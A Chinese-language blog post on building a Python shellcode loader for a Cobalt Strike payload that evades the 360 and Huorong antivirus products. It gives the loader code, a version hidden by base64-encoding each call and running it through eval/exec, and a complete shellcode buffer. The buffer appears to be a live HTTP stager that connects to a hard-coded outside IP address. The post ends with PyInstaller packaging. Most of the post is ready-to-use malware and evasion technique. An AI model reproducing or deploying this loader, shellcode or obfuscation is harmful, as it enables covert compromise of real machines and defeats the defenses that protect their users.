CS python马过火绒和360

起源

这篇文章的起源还是得从几天前说起，我问组里师傅免杀好做吗，360和火绒好过吗，哪知道师傅给我来了一句有手就行，给我幼小的心灵造成了极大的震撼

这不行啊 我得研究一下

百度了一下 现在主流杀软查杀分为静态查杀和动态行为查杀，前者个人PC上为代表的是360和火绒，后者则是Windows Defender
特征码和启发式查杀在免杀制作过程中，需要非常注意的是启发式查杀，因为启发式查杀对壳一类的查杀非常厉害。或者数组中包含PE文件，也会直接被定为为病毒。这就导致了你需要尽量模仿正常PE文件才能绕过查杀
绕过
通过百度我们知道要绕过静态查杀需要绕过两种查杀方式，一种为指定特征码查杀，一种为启发式查杀。

实操

先上CS 生成一个python的payload，记得勾选和操作系统对应的位数的payload

然后shellcode 加载器的源码如下

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    # eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

然后简单的混淆

import ctypes  
import base64  
def shellCodeLoad(shellcode):  
    cc="Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NA=="  
 exec(base64.b64decode(cc))  

    ptr ="Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSxjdHlwZXMuY19pbnQoMHg0MCkp"  
 ptr=eval(base64.b64decode(ptr))  

    eval(base64.b64decode(  
        "Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))  

    handle = "Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX3VpbnQ2NChwdHIpLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkp"  
 handle=eval(base64.b64decode(handle))  

    a="Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLCBjdHlwZXMuY19pbnQoLTEpKQ=="  
 eval(base64.b64decode(a))  

if __name__ == "__main__":  
    buf = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xe4\x03\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x32\x50\x6a\x71\x00\x46\x33\x3c\x3c\x6f\x02\xc4\x64\x38\x8a\xc2\xe1\xa4\xa1\x05\x35\x42\x08\x6c\xe8\x25\x69\xd5\xf8\x01\x4e\xcc\xe2\xc6\xd9\xe8\xb0\x72\xef\x95\xf2\x54\x4d\x5f\x73\x16\x4d\x70\x28\x48\x45\x3d\xa9\x7d\xd4\x13\xf5\xf1\x54\xc8\xb5\xd2\x4f\x74\xaa\xe6\x31\x63\xce\x27\x2a\xf6\x26\xac\x9c\xb2\x63\xf1\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x29\x0d\x0a\x00\xf7\xad\xc5\x68\x6e\x5e\xb9\x91\x77\xe7\x7c\xd3\x83\xf7\x94\x45\x45\x8c\x80\x92\x5e\x89\x79\x0c\x62\xe4\x1e\xd3\xab\xa4\x08\xf9\xd8\x69\x42\x9c\x35\x63\xb3\x84\x8a\x54\x27\x60\xe5\x53\x35\x6d\x39\x68\x8b\x04\x23\x1e\xd7\x9d\x65\xb9\x0e\x48\x37\x99\x22\x1f\x59\x08\xf2\x8f\x34\x48\x12\xad\xfe\xbf\x19\xc1\x37\xe5\xb3\x1f\xef\x48\x97\x5f\xdd\xb4\x24\x23\x0d\xc8\x72\x47\xaa\x29\x96\x13\x7e\xe1\xb2\x95\xa0\x7e\xd7\x99\xdd\x79\xfb\x9d\xb6\x18\xd5\x2b\x63\xbc\x51\xc8\x6e\x0f\x0a\xc4\xa8\xb2\xee\xec\x16\xb3\xcf\xee\x26\xf8\xc8\xa3\xb7\x20\x89\xee\x4b\x20\x80\x34\x95\x61\x26\x04\x09\x78\x3e\x8f\x84\xc5\xfa\x65\xc3\x2a\xd2\x42\xee\x7c\x1a\x02\x35\x86\xfb\x1f\x31\x4d\xc1\xd3\xbc\x19\x29\x34\x1b\x79\x39\x3f\x85\x43\xc3\x56\x94\x3f\x60\xb3\x1f\xfd\xe6\xde\x71\xa6\x04\x69\xce\xab\x96\xaf\x42\x05\x0a\xfd\x56\xf8\x9c\x71\xde\xf4\x3b\x90\x03\x32\x47\x5a\xfe\xc9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x32\x39\x2e\x36\x34\x2e\x31\x37\x31\x00\x19\x69\xa0\x8d"  
 shellCodeLoad(bytearray(buf))

buf里的是刚才生成的shellcode

pyinstaller打包
查杀效果